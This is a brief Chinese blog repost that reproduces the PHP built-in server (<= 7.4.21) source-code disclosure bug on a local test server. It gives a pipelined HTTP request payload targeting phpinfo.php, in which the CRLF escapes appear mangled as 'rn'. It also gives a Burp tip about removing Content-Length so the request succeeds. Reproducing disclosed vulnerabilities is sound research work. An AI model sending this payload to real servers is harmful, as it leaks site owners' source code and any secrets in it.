PHP <= 7.4.21远程源码泄露漏洞复现

admin 2023年2月2日01:09:00评论704 views1字数 335阅读1分7秒阅读模式

英文原版文章地址:

https://blog.projectdiscovery.io/php-http-server-source-disclosure/


环境直接使用PHP study下载PHP,然后使用 -S 的方式启动服务测试

测试版本从 5.4.45nts - 8.0.2nts 都是可以成功读取到源码的

PHP <= 7.4.21远程源码泄露漏洞复现

直接打payload,但是发现并没有读取到源码

GET /phpinfo.php HTTP/1.1 Host: 127.0.0.1rnrnGET / HTTP/1.1rnrn

PHP <= 7.4.21远程源码泄露漏洞复现

一个坑点,使用burp测试的时候要关掉自动填充Content-Length

勾选掉下面这一行

PHP <= 7.4.21远程源码泄露漏洞复现

然后把Content-Length行删除掉再发包

PHP <= 7.4.21远程源码泄露漏洞复现


原文始发于微信公众号(刨洞技术交流):PHP <= 7.4.21远程源码泄露漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月2日01:09:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP <= 7.4.21远程源码泄露漏洞复现https://cn-sec.com/archives/1530845.html

发表评论

匿名网友 填写信息